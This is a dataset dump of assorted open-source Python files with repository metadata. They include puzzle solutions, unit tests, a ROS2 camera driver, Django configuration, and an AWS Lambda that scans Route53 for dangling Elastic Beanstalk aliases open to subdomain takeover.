| column | dtype | value range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 1 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 239 |
| max_stars_repo_name | string | length 5 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 (nullable ⌀) | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string (nullable ⌀) | length 24 |
| max_stars_repo_stars_event_max_datetime | string (nullable ⌀) | length 24 |
| max_issues_repo_path | string | length 3 to 239 |
| max_issues_repo_name | string | length 5 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 (nullable ⌀) | 1 to 67k |
| max_issues_repo_issues_event_min_datetime | string (nullable ⌀) | length 24 |
| max_issues_repo_issues_event_max_datetime | string (nullable ⌀) | length 24 |
| max_forks_repo_path | string | length 3 to 239 |
| max_forks_repo_name | string | length 5 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 (nullable ⌀) | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string (nullable ⌀) | length 24 |
| max_forks_repo_forks_event_max_datetime | string (nullable ⌀) | length 24 |
| content | string | length 1 to 1.03M |
| avg_line_length | float64 | 1 to 958k |
| max_line_length | int64 | 1 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |

794fbf1811b974bc06de79ee633730607292449b | 3,242 | py | Python
12/navigation.py | SteScheller/AoC_2020 | f60d89d19b6c6c19e12f263fe46bc5f36b737327 | ["Unlicense"] | null | null | null
12/navigation.py | SteScheller/AoC_2020 | f60d89d19b6c6c19e12f263fe46bc5f36b737327 | ["Unlicense"] | null | null | null
12/navigation.py | SteScheller/AoC_2020 | f60d89d19b6c6c19e12f263fe46bc5f36b737327 | ["Unlicense"] | null | null | null
#!/usr/bin/env python3
import re
import math
from typing import List, Tuple
def parse_input(file_path: str) -> List[Tuple[str, int]]:
with open(file_path) as f:
lines = f.readlines()
instructions = list()
for l in lines:
m = re.fullmatch(r'(N|S|E|W|L|R|F)([\d]+)\n', l)
instructions.append((m.group(1), int(m.group(2))))
return instructions
class Ferry:
def __init__(self):
self.pos = (0, 0)
self.wp = (10, 1)
self.angle = 0
def rotate(self, angle: int) -> None:
self.angle += angle
if self.angle < 0: self.angle = -1 * (abs(self.angle) % 360);
else: self.angle %= 360
def forward(self, distance: int) -> None:
x = round(math.cos(self.angle / 180 * math.pi) * distance)
y = round(math.sin(self.angle / 180 * math.pi) * distance)
self.pos = self.pos[0] + x, self.pos[1] + y
def move(self, inst: Tuple[str, int]) -> None:
action, value = inst
if action == 'N': self.pos = (self.pos[0], self.pos[1] + value);
elif action == 'S': self.pos = (self.pos[0], self.pos[1] - value);
elif action == 'E': self.pos = (self.pos[0] + value, self.pos[1]);
elif action == 'W': self.pos = (self.pos[0] - value, self.pos[1]);
elif action == 'L': self.rotate(value);
elif action == 'R': self.rotate(-1 * value);
elif action == 'F': self.forward(value);
def rotate_waypoint(self, angle: int) -> None:
d = math.sqrt(self.wp[0]**2 + self.wp[1]**2)
angle += math.atan2(self.wp[1], self.wp[0]) / math.pi * 180
if angle < 0: angle = -1 * (abs(angle) % 360);
else: angle %= 360
self.wp = (
round(math.cos(angle / 180 * math.pi) * d),
round(math.sin(angle / 180 * math.pi) * d) )
def forward_waypoint(self, distance: int) -> None:
self.pos = (
self.pos[0] + distance * self.wp[0],
self.pos[1] + distance * self.wp[1] )
def move_waypoint(self, inst: Tuple[str, int]) -> None:
action, value = inst
if action == 'N': self.wp = (self.wp[0], self.wp[1] + value);
elif action == 'S': self.wp = (self.wp[0], self.wp[1] - value);
elif action == 'E': self.wp = (self.wp[0] + value, self.wp[1]);
elif action == 'W': self.wp = (self.wp[0] - value, self.wp[1]);
elif action == 'L': self.rotate_waypoint(value);
elif action == 'R': self.rotate_waypoint(-1 * value);
elif action == 'F': self.forward_waypoint(value);
def get_position(self) -> None:
return self.pos
def get_waypoint(self) -> None:
return self.wp
if __name__ == '__main__':
instructions = parse_input('input.txt')
ferry = Ferry()
for inst in instructions:
ferry.move(inst)
pos = ferry.get_position()
    print(('The ferry\'s Manhattan distance from its starting position is '
f'{abs(pos[0]) + abs(pos[1])}.'))
ferry = Ferry()
for inst in instructions:
ferry.move_waypoint(inst)
pos = ferry.get_position()
    print(('The ferry\'s Manhattan distance from its starting position is '
f'{abs(pos[0]) + abs(pos[1])} when using the waypoint method.'))
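# Editor's sketch (not part of the original solution): assuming, as in the
# AoC 2020 day 12 puzzle, that every L/R instruction is a multiple of 90
# degrees, the floating-point cos/sin plus round() above can be replaced by
# an exact integer rotation of a point around the origin.
def rotate_point_90(point: Tuple[int, int], times: int) -> Tuple[int, int]:
    """Rotate (x, y) counter-clockwise around (0, 0) by 90 degrees, `times` times."""
    x, y = point
    for _ in range(times % 4):
        x, y = -y, x
    return x, y

assert rotate_point_90((10, 1), 1) == (-1, 10)   # L90 applied to the start waypoint
assert rotate_point_90((10, 1), 3) == (1, -10)   # R90 is the same as three L90 turns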
| 37.264368 | 76 | 0.55768 |

794fbf1b23e1faea30e5fef56f20293dd0bd3d16 | 2,100 | py | Python
tests/test_class.py | Jon-Burr/memoclass | 93dc1c67fb14b91245e39a480957d0d31977e795 | ["MIT"] | null | null | null
tests/test_class.py | Jon-Burr/memoclass | 93dc1c67fb14b91245e39a480957d0d31977e795 | ["MIT"] | null | null | null
tests/test_class.py | Jon-Burr/memoclass | 93dc1c67fb14b91245e39a480957d0d31977e795 | ["MIT"] | null | null | null
""" Tests for MemoClass """
from memoclass.memoclass import MemoClass, mutates
from memoclass.memoize import memomethod
import pytest
class PartialSum(MemoClass):
def __init__(self, stored, **kwargs):
super(PartialSum, self).__init__(
mutable_attrs=["call_count"], **kwargs)
self.stored = stored
self.call_count = 0
@memomethod
def __call__(self, other):
self.call_count += 1
return self.stored + other
@mutates
def do_mutate(self):
pass
@classmethod
def reset(cls):
cls.__call__.clear_cache()
@memomethod
def call_twice(self, other):
self(other)
return self(other)
def test_cls():
""" Make sure that the test class is working """
assert PartialSum(5)(3) == 8
def test_cache():
""" Make sure that the cache is working """
PartialSum.reset()
a = PartialSum(5)
assert a(3) == 8
a(3)
assert a(5) == 10
assert a.call_count == 2
a = None
def test_mutate():
""" Make sure that the mutates functionality is working """
PartialSum.reset()
a = PartialSum(5)
assert a(3) == 8
a.stored = 3
assert a(3) == 6
assert a.call_count == 2
a.do_mutate()
assert a(3) == 6
assert a.call_count == 3
def test_disable():
""" Make sure that disabling the cache works correctly """
PartialSum.reset()
a = PartialSum(5)
a.disable_caches()
a(3)
a(3)
assert a.call_count == 2
def test_lock():
""" Make sure that locking works correctly """
PartialSum.reset()
a = PartialSum(5)
a.disable_caches()
with a.locked():
a(3)
a(3)
assert a.call_count == 1
with pytest.raises(ValueError):
a.stored = 5
a(3)
a(3)
assert a.call_count == 3
with a.locked():
a(3)
assert a.call_count == 4
def test_lockedfunc():
""" Make sure that a locking function works properly """
PartialSum.reset()
a = PartialSum(5)
a.disable_caches()
assert a.call_twice(3) == 8
assert a.call_count == 1
| 22.580645 | 63 | 0.594762 |

794fc0bd6c08fc4ec4e6110376ace5447a13868d | 1,055 | py | Python
pycvc/tests/external_tests.py | Geosyntec/python-cvc | 9d92efe81a10d2284f796a39673a17b8ef980d27 | ["BSD-3-Clause"] | null | null | null
pycvc/tests/external_tests.py | Geosyntec/python-cvc | 9d92efe81a10d2284f796a39673a17b8ef980d27 | ["BSD-3-Clause"] | null | null | null
pycvc/tests/external_tests.py | Geosyntec/python-cvc | 9d92efe81a10d2284f796a39673a17b8ef980d27 | ["BSD-3-Clause"] | null | null | null
import sys
import os
from six import StringIO
import datetime
from pkg_resources import resource_filename
import textwrap
from io import StringIO
import nose.tools as nt
from nose.plugins.attrib import attr
from unittest import mock
import numpy.testing as nptest
import pandas.util.testing as pdtest
import numpy as np
import pandas
import pyodbc
import wqio
from wqio import utils
from pycvc import dataAccess, external
def test__fix_nsqd_bacteria_units():
cols = ['param', 'conc_units', 'res']
inputdf = pandas.DataFrame({
'conc_units': ['MPN/100 mL', 'MPN/100 mL', 'CFU/100 mL', 'ug/L'],
'param': ['E Coli', 'E Coli', 'Fecal', 'Copper'],
'res': [1, 2, 3, 4]
})
outputdf = external._fix_nsqd_bacteria_units(inputdf, unitscol='conc_units')
expected = pandas.DataFrame({
'conc_units': ['CFU/100 mL', 'CFU/100 mL', 'CFU/100 mL', 'ug/L'],
'param': ['E Coli', 'E Coli', 'Fecal', 'Copper'],
'res': [1, 2, 3, 4]
})
pdtest.assert_frame_equal(outputdf[cols], expected[cols])
| 25.119048 | 80 | 0.67109 |

794fc0f34398b88aaed2e1cc14c2c36123438118 | 739 | py | Python
server/helpers/combineMixerTwitchStreams.py | RjDrury/Cryptic_live | 3091ddfcfd31b65f949a65c5b0292821bb5924c0 | ["MIT"] | null | null | null
server/helpers/combineMixerTwitchStreams.py | RjDrury/Cryptic_live | 3091ddfcfd31b65f949a65c5b0292821bb5924c0 | ["MIT"] | 4 | 2021-03-10T16:04:23.000Z | 2022-01-22T11:47:59.000Z
server/helpers/combineMixerTwitchStreams.py | RjDrury/Cryptic_live | 3091ddfcfd31b65f949a65c5b0292821bb5924c0 | ["MIT"] | null | null | null
from operator import itemgetter
def combine_twitch_mix_streams(twitch, mixer):
stream_info = []
for stream in twitch["data"]:
stream_info.append({"name":stream["user_name"], "viewers":stream["viewer_count"]
,"thumbnail":stream["thumbnail_url"],"game_id":stream["game_id"],
"title":stream["title"], "user_id":stream["user_id"], "twitch":True, "mixer":False})
for stream in mixer:
stream_info.append({"name":stream["token"], "viewers":stream["viewersCurrent"]
,"thumbnail":stream["bannerUrl"],"game_id":stream["typeId"], "title":stream["name"],
"platform":"mixer","twitch":False, "mixer":True})
return sorted(stream_info, key=itemgetter("viewers"), reverse=True)
| 46.1875 | 93 | 0.656292 |

794fc190c0dcf82e433a76d90e37c06941508ce7 | 891 | py | Python
firstone/firstone/urls.py | avulaankith/Django-Codes | e4216f6a51b5baa745d5a0214afcaf024d048f44 | ["MIT"] | null | null | null
firstone/firstone/urls.py | avulaankith/Django-Codes | e4216f6a51b5baa745d5a0214afcaf024d048f44 | ["MIT"] | null | null | null
firstone/firstone/urls.py | avulaankith/Django-Codes | e4216f6a51b5baa745d5a0214afcaf024d048f44 | ["MIT"] | null | null | null
"""firstone URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('admin/', admin.site.urls),
path('hello/', include("hello.urls")),
path('tasks/', include("tasks.urls")),
path('newyear/', include("newyear.urls"))
]
| 35.64 | 77 | 0.693603 |

794fc1eae33988609e7152e7521416c14c6eaee3 | 3,574 | py | Python
venv/Lib/site-packages/caffe2/quantization/server/int8_gen_quant_params_min_max_test.py | Westlanderz/AI-Plat1 | 1187c22819e5135e8e8189c99b86a93a0d66b8d8 | ["MIT"] | 1 | 2022-01-08T12:30:44.000Z | 2022-01-08T12:30:44.000Z
venv/Lib/site-packages/caffe2/quantization/server/int8_gen_quant_params_min_max_test.py | Westlanderz/AI-Plat1 | 1187c22819e5135e8e8189c99b86a93a0d66b8d8 | ["MIT"] | null | null | null
venv/Lib/site-packages/caffe2/quantization/server/int8_gen_quant_params_min_max_test.py | Westlanderz/AI-Plat1 | 1187c22819e5135e8e8189c99b86a93a0d66b8d8 | ["MIT"] | null | null | null
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.python import core, workspace
from caffe2.quantization.server import dnnlowp_pybind11
from hypothesis import given, settings
class TestInt8GenQuantParamsMinMaxOperator(hu.HypothesisTestCase):
@settings(max_examples=20, deadline=None)
@given(
n=st.integers(10, 10),
m=st.integers(10, 10),
preserve_sparsity=st.booleans(),
rnd_seed=st.integers(1, 5),
**hu.gcs_cpu_only
)
def test_int8_gen_quant_params_min_max_op(
self, n, m, preserve_sparsity, rnd_seed, gc, dc
):
X_min = 0 if preserve_sparsity else -77
X_max = X_min + 255
np.random.seed(rnd_seed)
X = np.round(np.random.rand(n, m) * (X_max - X_min) + X_min).astype(
np.float32
)
# Calculate X_qparam
hist, bin_edges = np.histogram(X.flatten(), bins=2048)
X_qparam = dnnlowp_pybind11.ChooseStaticQuantizationParams(
np.min(X), np.max(X), hist, preserve_sparsity, 8, "MIN_MAX_QUANTIZATION"
)
# Build a net to generate X's qparam using the Int8GenQuantParamsMinMax op
workspace.FeedBlob("X", X, device_option=gc)
workspace.FeedBlob("X_min", np.array([np.min(X)]), device_option=gc)
workspace.FeedBlob("X_max", np.array([np.max(X)]), device_option=gc)
dnnlowp_pybind11.CreateInt8QuantSchemeBlob(
"quant_scheme", "MIN_MAX_QUANTIZATION", preserve_sparsity
)
assert workspace.HasBlob(
"quant_scheme"
), "Failed to create the quant_scheme blob in current workspace"
gen_quant_params_net = core.Net("gen_quant_params_min_max")
gen_quant_params_op = core.CreateOperator(
"Int8GenQuantParamsMinMax",
["X_min", "X_max", "quant_scheme"],
["quant_param"],
device_option=gc,
)
gen_quant_params_net.Proto().op.extend([gen_quant_params_op])
assert workspace.RunNetOnce(
gen_quant_params_net
), "Failed to run the gen_quant_params net"
scale, zero_point = dnnlowp_pybind11.ObserveInt8QuantParamsBlob("quant_param")
shapes, types = workspace.InferShapesAndTypes(
[gen_quant_params_net],
blob_dimensions={"X": [n, m], "X_min": [1], "X_max": [1], "quant_scheme": [1]},
blob_types={"X": core.DataType.FLOAT, "X_min": core.DataType.FLOAT, "X_max": core.DataType.FLOAT, "quant_scheme": core.DataType.STRING}
)
self.assertEqual(shapes["quant_param"], [1])
self.assertEqual(types["quant_param"], core.DataType.FLOAT)
np.testing.assert_equal(scale, X_qparam.scale)
np.testing.assert_equal(zero_point, X_qparam.zero_point)
| 42.547619 | 148 | 0.643816 |

794fc22fc4e97e6784a7d4704951806c270f9bda | 247 | py | Python
data/aihub/preprocessed_data.py | shwksl101/nc_style_transfer | 104c93f9e0f302fcfff6e7accd1a4f82f90202c3 | ["Apache-2.0"] | null | null | null
data/aihub/preprocessed_data.py | shwksl101/nc_style_transfer | 104c93f9e0f302fcfff6e7accd1a4f82f90202c3 | ["Apache-2.0"] | null | null | null
data/aihub/preprocessed_data.py | shwksl101/nc_style_transfer | 104c93f9e0f302fcfff6e7accd1a4f82f90202c3 | ["Apache-2.0"] | null | null | null
import sentencepiece as spm
def make_vocab_file():
spm.SentencePieceTrainer.train(input='./colloquial_literary.txt', model_prefix='spm',
vocab_size=50000)
if __name__ == '__main__':
make_vocab_file()
| 22.454545 | 89 | 0.647773 |

794fc3610962879f1eaf886ac05d401e19a3d9d3 | 198 | py | Python
instrument/instrument/doctype/pick_list_items/pick_list_items.py | sds2402/rushabhinstruments_V13 | 2a3e293996b9b01f952aa3f76b8b679dce98bc3e | ["MIT"] | 1 | 2021-07-14T12:34:14.000Z | 2021-07-14T12:34:14.000Z
instrument/instrument/doctype/pick_list_items/pick_list_items.py | sds2402/rushabhinstruments_V13 | 2a3e293996b9b01f952aa3f76b8b679dce98bc3e | ["MIT"] | null | null | null
instrument/instrument/doctype/pick_list_items/pick_list_items.py | sds2402/rushabhinstruments_V13 | 2a3e293996b9b01f952aa3f76b8b679dce98bc3e | ["MIT"] | 4 | 2021-07-06T10:01:11.000Z | 2021-12-28T20:40:30.000Z
# Copyright (c) 2021, instrument and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
class PickListItems(Document):
pass
| 22 | 49 | 0.79798 |

794fc37a26a947f0f14c2b2defeb4af7b7070785 | 7,128 | py | Python
terraform-modules/lambda/code/alias-eb/alias-eb.py | trustedshops/domain-protect | d103aa086b8d937eeb21d76685d317818c6d344c | ["Apache-2.0"] | null | null | null
terraform-modules/lambda/code/alias-eb/alias-eb.py | trustedshops/domain-protect | d103aa086b8d937eeb21d76685d317818c6d344c | ["Apache-2.0"] | null | null | null
terraform-modules/lambda/code/alias-eb/alias-eb.py | trustedshops/domain-protect | d103aa086b8d937eeb21d76685d317818c6d344c | ["Apache-2.0"] | null | null | null
#!/usr/bin/env python
import os, boto3
import logging
import json
import dns.resolver
from botocore.exceptions import ClientError
from datetime import datetime
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, datetime):
serial = obj.isoformat()
return serial
raise TypeError("Type not serializable")
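# Editor's sketch (illustrative, not part of the upstream Lambda): json_serial
# is meant to be plugged into json.dumps via the `default` hook, so datetime
# values are emitted as ISO-8601 strings instead of raising a TypeError.
assert json.dumps({"seen": datetime(2021, 1, 1)}, default=json_serial) == \
    '{"seen": "2021-01-01T00:00:00"}'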
def assume_role(account, security_audit_role_name, external_id, project, region):
security_audit_role_arn = "arn:aws:iam::" + account + ":role/" + security_audit_role_name
stsclient = boto3.client('sts')
try:
if external_id == "":
assumed_role_object = stsclient.assume_role(RoleArn = security_audit_role_arn, RoleSessionName = project)
print("Assumed " + security_audit_role_name + " role in account " + account)
else:
assumed_role_object = stsclient.assume_role(RoleArn = security_audit_role_arn, RoleSessionName = project, ExternalId = external_id)
print("Assumed " + security_audit_role_name + " role in account " + account)
except Exception:
logging.exception("ERROR: Failed to assume " + security_audit_role_name + " role in AWS account " + account)
credentials = assumed_role_object['Credentials']
aws_access_key_id = credentials["AccessKeyId"]
aws_secret_access_key = credentials["SecretAccessKey"]
aws_session_token = credentials["SessionToken"]
boto3_session = boto3.session.Session(aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, region_name=region)
return boto3_session
def vulnerable_alias_eb(domain_name):
try:
dns.resolver.resolve(domain_name, 'A')
return "False"
except dns.resolver.NoAnswer:
return "True"
except:
return "False"
def lambda_handler(event, context):
# set variables
region = os.environ['AWS_REGION']
org_primary_account = os.environ['ORG_PRIMARY_ACCOUNT']
security_audit_role_name = os.environ['SECURITY_AUDIT_ROLE_NAME']
external_id = os.environ['EXTERNAL_ID']
project = os.environ['PROJECT']
sns_topic_arn = os.environ['SNS_TOPIC_ARN']
vulnerable_domains = []
json_data = {"Findings": []}
boto3_session = assume_role(org_primary_account, security_audit_role_name, external_id, project, region)
client = boto3_session.client(service_name = "organizations")
try:
paginator_accounts = client.get_paginator('list_accounts')
pages_accounts = paginator_accounts.paginate()
for page_accounts in pages_accounts:
accounts = page_accounts['Accounts']
for account in accounts:
account_id = account['Id']
account_name = account['Name']
try:
boto3_session = assume_role(account_id, security_audit_role_name, external_id, project, region)
client = boto3_session.client('route53')
try:
paginator_zones = client.get_paginator('list_hosted_zones')
pages_zones = paginator_zones.paginate()
i=0
for page_zones in pages_zones:
hosted_zones = page_zones['HostedZones']
#print(json.dumps(hosted_zones, sort_keys=True, indent=2, default=json_serial))
for hosted_zone in hosted_zones:
i = i + 1
if not hosted_zone['Config']['PrivateZone']:
print("Searching for Elastic Beanstalk alias records in hosted zone %s" % (hosted_zone['Name']) )
try:
paginator_records = client.get_paginator('list_resource_record_sets')
pages_records = paginator_records.paginate(HostedZoneId=hosted_zone['Id'], StartRecordName='_', StartRecordType='NS')
for page_records in pages_records:
record_sets = page_records['ResourceRecordSets']
#print(json.dumps(record_sets, sort_keys=True, indent=2, default=json_serial))
for record in record_sets:
if "AliasTarget" in record:
if "elasticbeanstalk.com" in record['AliasTarget']['DNSName']:
print("checking if " + record['Name'] + " is vulnerable to takeover")
domain_name = record['Name']
try:
result = vulnerable_alias_eb(domain_name)
if result == "True":
print(domain_name + "in " + account_name + " is vulnerable")
vulnerable_domains.append(domain_name)
json_data["Findings"].append({"Account": account_name, "AccountID" : str(account_id), "Domain": domain_name})
except:
pass
except:
print("ERROR: Lambda execution role requires route53:ListResourceRecordSets permission in " + account_name + " account")
if i == 0:
print("No hosted zones found in " + account_name + " account")
except:
print("ERROR: Lambda execution role requires route53:ListHostedZones permission in " + account_name + " account")
except:
print("ERROR: unable to assume role in " + account_name + " account " + account_id)
except Exception:
logging.exception("ERROR: Unable to list AWS accounts across organization with primary account " + org_primary_account)
try:
print(json.dumps(json_data, sort_keys=True, indent=2, default=json_serial))
#print(json_data)
client = boto3.client('sns')
if len(vulnerable_domains) > 0:
response = client.publish(
TargetArn=sns_topic_arn,
Subject="Vulnerable Elastic Beanstalk alias records found in Amazon Route53",
Message=json.dumps({'default': json.dumps(json_data)}),
MessageStructure='json'
)
print(response)
except:
logging.exception("ERROR: Unable to publish to SNS topic " + sns_topic_arn)
| 50.553191 | 180 | 0.55289 |

794fc40d5e82408b04fa887b84ce64e912add7c8 | 6,765 | py | Python
webots_ros2_core/webots_ros2_core/devices/camera_device.py | renan028/webots_ros2 | 24cfd4e99b73b89e38f3f4993339473c27fa7661 | ["Apache-2.0"] | 1 | 2021-02-25T05:03:38.000Z | 2021-02-25T05:03:38.000Z
webots_ros2_core/webots_ros2_core/devices/camera_device.py | renan028/webots_ros2 | 24cfd4e99b73b89e38f3f4993339473c27fa7661 | ["Apache-2.0"] | null | null | null
webots_ros2_core/webots_ros2_core/devices/camera_device.py | renan028/webots_ros2 | 24cfd4e99b73b89e38f3f4993339473c27fa7661 | ["Apache-2.0"] | null | null | null
# Copyright 1996-2021 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Camera device."""
from sensor_msgs.msg import Image, CameraInfo
from webots_ros2_msgs.msg import RecognitionObjects, RecognitionObject
from rclpy.time import Time
from rclpy.qos import DurabilityPolicy, HistoryPolicy, QoSProfile, QoSReliabilityPolicy, qos_profile_sensor_data
from .sensor_device import SensorDevice
class CameraDevice(SensorDevice):
"""
ROS2 wrapper for Webots Camera node.
Creates suitable ROS2 interface based on Webots [Camera](https://cyberbotics.com/doc/reference/camera) node instance:
    It allows the following functionalities:
- Publishes raw image of type `sensor_msgs/Image`
- Publishes intrinsic camera parameters of type `sensor_msgs/CameraInfo` (latched topic)
Args:
node (WebotsNode): The ROS2 node.
device_key (str): Unique identifier of the device used for configuration.
wb_device (Camera): Webots node of type Camera.
Kwargs:
params (dict): Inherited from `SensorDevice`
"""
def __init__(self, node, device_key, wb_device, params=None):
super().__init__(node, device_key, wb_device, params)
self._camera_info_publisher = None
self._recognition_publisher = None
self._image_publisher = None
# Create topics
if not self._disable:
self._image_publisher = self._node.create_publisher(
Image,
self._topic_name + '/image_raw',
qos_profile_sensor_data
)
self._camera_info_publisher = self._node.create_publisher(
CameraInfo,
self._topic_name + '/camera_info',
QoSProfile(
depth=1,
reliability=QoSReliabilityPolicy.RELIABLE,
durability=DurabilityPolicy.TRANSIENT_LOCAL,
history=HistoryPolicy.KEEP_LAST,
)
)
if self._wb_device.hasRecognition():
self._recognition_publisher = self._node.create_publisher(
RecognitionObjects,
self._topic_name + '/recognition',
qos_profile_sensor_data
)
# CameraInfo data
self.__message_info = CameraInfo()
self.__message_info.header.stamp = Time(seconds=self._node.robot.getTime()).to_msg()
self.__message_info.height = self._wb_device.getHeight()
self.__message_info.width = self._wb_device.getWidth()
self.__message_info.distortion_model = 'plumb_bob'
focal_length = self._wb_device.getFocalLength()
if focal_length == 0:
focal_length = 570.34 # Identical to Orbbec Astra
self.__message_info.d = [0.0, 0.0, 0.0, 0.0, 0.0]
self.__message_info.r = [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
self.__message_info.k = [
focal_length, 0.0, self._wb_device.getWidth() / 2,
0.0, focal_length, self._wb_device.getHeight() / 2,
0.0, 0.0, 1.0
]
self.__message_info.p = [
focal_length, 0.0, self._wb_device.getWidth() / 2, 0.0,
0.0, focal_length, self._wb_device.getHeight() / 2, 0.0,
0.0, 0.0, 1.0, 0.0
]
self._camera_info_publisher.publish(self.__message_info)
# Load parameters
camera_period_param = node.declare_parameter(wb_device.getName() + '_period', self._timestep)
self._camera_period = camera_period_param.value
def step(self):
stamp = super().step()
if not stamp:
return
# Publish camera data
if self._image_publisher.get_subscription_count() > 0 or self._always_publish:
self._wb_device.enable(self._timestep)
image = self._wb_device.getImage()
if image is None:
return
# Image data
msg = Image()
msg.header.stamp = stamp
msg.header.frame_id = self._frame_id
msg.height = self._wb_device.getHeight()
msg.width = self._wb_device.getWidth()
msg.is_bigendian = False
msg.step = self._wb_device.getWidth() * 4
            # We pass `data` directly so that we avoid using the `data` setter.
# Otherwise ROS2 converts data to `array.array` which slows down the simulation as it copies memory internally.
# Both, `bytearray` and `array.array`, implement Python buffer protocol, so we should not see unpredictable
# behavior.
# deepcode ignore W0212: Avoid conversion from `bytearray` to `array.array`.
msg._data = image
msg.encoding = 'bgra8'
self._image_publisher.publish(msg)
self.__message_info.header.stamp = Time(seconds=self._node.robot.getTime()).to_msg()
self._camera_info_publisher.publish(self.__message_info)
if self._wb_device.hasRecognition() and self._recognition_publisher.get_subscription_count() > 0:
self._wb_device.recognitionEnable(self._timestep)
objects = self._wb_device.getRecognitionObjects()
if objects is None:
return
# Recognition data
msg = RecognitionObjects()
msg.header.stamp = stamp
msg.header.frame_id = self._frame_id
for obj in objects:
msg_obj = RecognitionObject()
msg_obj.position = obj.get_position()
msg_obj.position_on_image = obj.get_position_on_image()
msg_obj.size_on_image = obj.get_size_on_image()
msg_obj.number_of_colors = obj.get_number_of_colors()
msg_obj.colors = obj.get_colors()
msg_obj.model = str(obj.get_model())
msg.objects.append(msg_obj)
self._recognition_publisher.publish(msg)
else:
self._wb_device.recognitionDisable()
else:
self._wb_device.disable()
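# Editor's sketch (illustrative only, not part of the original driver): a
# minimal rclpy node that consumes the image topic this wrapper publishes.
# The topic name 'camera/image_raw' is an assumption; the real name depends on
# the device key / topic prefix configured for the robot.
import rclpy
from rclpy.node import Node


class ImageListener(Node):
    def __init__(self):
        super().__init__('image_listener')
        # Match the sensor-data QoS used by the image publisher above.
        self.create_subscription(Image, 'camera/image_raw', self.on_image,
                                 qos_profile_sensor_data)

    def on_image(self, msg):
        self.get_logger().info('got %dx%d %s frame' % (msg.width, msg.height, msg.encoding))


def listen():
    rclpy.init()
    rclpy.spin(ImageListener())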
| 42.816456 | 123 | 0.610791 |

794fc48adf79a4fcf42ee037e7f35fea076f24dc | 947 | py | Python
src/vsc/model/expr_dynamic_model.py | fvutils/py-vsc | e30ffae1b750d8182d102b1fe5b1cfdce017a092 | ["Apache-2.0"] | 54 | 2020-03-28T17:54:00.000Z | 2022-03-27T08:53:13.000Z
src/vsc/model/expr_dynamic_model.py | fvutils/py-vsc | e30ffae1b750d8182d102b1fe5b1cfdce017a092 | ["Apache-2.0"] | 124 | 2020-04-10T03:06:03.000Z | 2022-03-24T18:35:46.000Z
src/vsc/model/expr_dynamic_model.py | fvutils/py-vsc | e30ffae1b750d8182d102b1fe5b1cfdce017a092 | ["Apache-2.0"] | 17 | 2020-04-09T21:47:58.000Z | 2022-02-23T19:37:37.000Z
'''
Created on Aug 21, 2020
@author: ballance
'''
from vsc.model.expr_model import ExprModel
class ExprDynamicModel(ExprModel):
'''Base class for expressions that must be computed dynamically'''
def __init__(self):
self.cached_expr = None
self.cached_node = None
pass
def reset(self):
self.cached_expr = None
self.cached_node = None
def expr(self):
if self.cached_expr is None:
self.cached_expr = self.build_expr()
return self.cached_expr
def build(self, btor, ctx_width=-1):
if self.cached_expr is None:
self.cached_expr = self.build_expr()
if self.cached_node is None:
self.cached_node = self.cached_expr.build(btor)
return self.cached_node
def build_expr(self):
raise Exception("Class " + str(type(self)) + " does not implement build_expr")
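# Editor's sketch (hypothetical subclass, not part of py-vsc): a concrete
# dynamic expression only needs to supply build_expr(); expr() and build()
# then cache its result until reset() is called.
class ExprWrapDynamicModel(ExprDynamicModel):
    '''Toy dynamic expression that simply wraps an already-constructed expression'''

    def __init__(self, wrapped: ExprModel):
        super().__init__()
        self.wrapped = wrapped

    def build_expr(self):
        # Only re-evaluated after reset(); otherwise the cached value is reused
        return self.wrapped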
| 27.057143 | 86 | 0.608237 |

794fc4af9d6e7ef0f36216f8f67d788d184fdda2 | 37 | py | Python
login.py | TmacChenQian/django26 | 59c0afe075a5c9454a42bb27cdba8ac56e7582fc | ["MIT"] | null | null | null
login.py | TmacChenQian/django26 | 59c0afe075a5c9454a42bb27cdba8ac56e7582fc | ["MIT"] | null | null | null
login.py | TmacChenQian/django26 | 59c0afe075a5c9454a42bb27cdba8ac56e7582fc | ["MIT"] | null | null | null
num1=1
num2=2
num3=3
num4=40
num5=5
| 5.285714 | 7 | 0.702703 |

